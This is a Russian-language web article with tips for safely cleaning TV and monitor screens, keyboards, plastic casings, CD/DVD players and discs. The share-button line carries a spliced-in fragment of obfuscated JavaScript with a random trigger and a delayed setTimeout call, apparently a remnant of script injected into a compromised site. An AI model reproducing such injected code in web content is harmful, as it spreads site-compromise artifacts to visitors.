www.osnovosti.ru
smk-pride.ru

​Как почистить клавиатуру, телевизор и другую электронику

2eac48b7
Как почистить клавиатуру, удалить пыль с экрана телевизора, компьютера и других устройств? Если вы не хотите причинить технике вред — оставьте влажные салфетки и средства для мытья окон. Мы подготовили гораздо более безопасные рекомендации!

Мониторы и экраны телевизоров
Мониторы или экраны телевизоров нельзя чистить ничем, кроме чистой воды или средств, предназначенных именно для экраном. В продаже можно найти различные виды распылителей, а также наборы для чистки черной техники: то есть, телевизоров, LCD-дисплеев и компьютеров. Существуют специальные салфетки или можно пользоваться так называемой шведской салфеткой.
1. Во-первых, удалить пыль с экрана лучше всего мягкой кистью. Как вариант — можно сдуть ее холодным воздушным потоком пылесоса. Сдувать пыль феном специалисты не рекомендуют, чтобы не треснул экран.
2. Если вы хотите использовать воду (по мнению экспертов, в идеале дистиллированную), то лишь в небольших количествах. И не брызгайте ею непосредственно на экран. Это же относится к специальным средствам для чистки. Слегка смочите ткань и ею пройдитесь по поверхности. Вытирать экран следует без нажима.
3. Используйте мягкую ткань из микроволокна, смоченную в теплой (идеально — дистиллированной) воде. Никогда не пользуйтесь бумажным полотенцем, туалетной бумагой или жесткой тканью.
4. Чистить можно только тогда, когда телевизор не только выключен, но и полностью остыл. На нагретом экране всегда остаются размытые пятна. Лучше всего провод вытащить из розетки.
Для очистки экрана наряду со специальными чистящими средствами необходима салфетка из антистатических тканей, которая поможет против оседания пыли. У модели телевизоров более новых серий антистатическая тряпочка прилагается в комплекте. Она изготовлена из нетканого материала, что предотвращает прилипание волокон пыли к экрану.
Как почистить клавиатуру
Здесь действует правило: перед очисткой клавиатуры следует ее отключить от компьютера или выключить ноутбук. Затем положить вверх дном, и потоком воздуха вычистить мусор. Далее каждую клавишу необходимо вытереть тканью или салфеткой с небольшим количеством средства для мытья посуды. Важно: ткань должна быть слегка влажной, а не такой, чтобы с нее капала жидкость. Также имеются специальные препараты, такие как специальный «пластилин», который затекает между клавишами и таким образом удаляет грязь. Мы как-то писали о рецепте «тряпки-желе», которая служит для тех же целей. Как альтернатива — можно использовать щетку.
Пластмасса бытовой электроники
Очистить пластиковые детали бытовой техники — то есть, их «коробку» — уже проще. Для этого понадобится мягкая влажная ткань с очень слабым раствором жидкости для мытья посуды. Но это относится только к серой твердой пластмассе. Чем больше блестит материал, тем больше требуется ухода, чтобы не были видны подтеки и разводы.
В продаже есть средства для блестящего пластика. Вы можете найти их, например, в магазинах и отделах для автомобилистов, потому что он часто находится в салонах автомобилей. Для пластмасс, особенно блестящих, не используйте средства, которые могут поцарапать поверхность. Всякий раз, когда чистите влажной тряпкой, обязательно вытирайте поверхность полностью досуха.
CD и DVD-плееры
У них время от времени нужно чистить не только поверхность, но и механику, которая забивается пылью. Это может быть причиной неправильного воспроизведения дисков. Чистить можно специальными средствами для очистки CD или спиртом. Если это не помогает, то лучше доверить дело специалистам.
Следует периодически очищать также сами компакт-диски, которые достаточно просто протереть тканью из микроволокна. Ни в коем случае не используйте старую рубашку или брюки, вы можете диск поцарапать. Вариант — много раз выстиранная хлопчатобумажная футболка без рисунков. Для очистки можно также использовать специальные спреи и другие чистящие средства.
А как вы чистите ваши приборы? Посоветуйте другим!

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика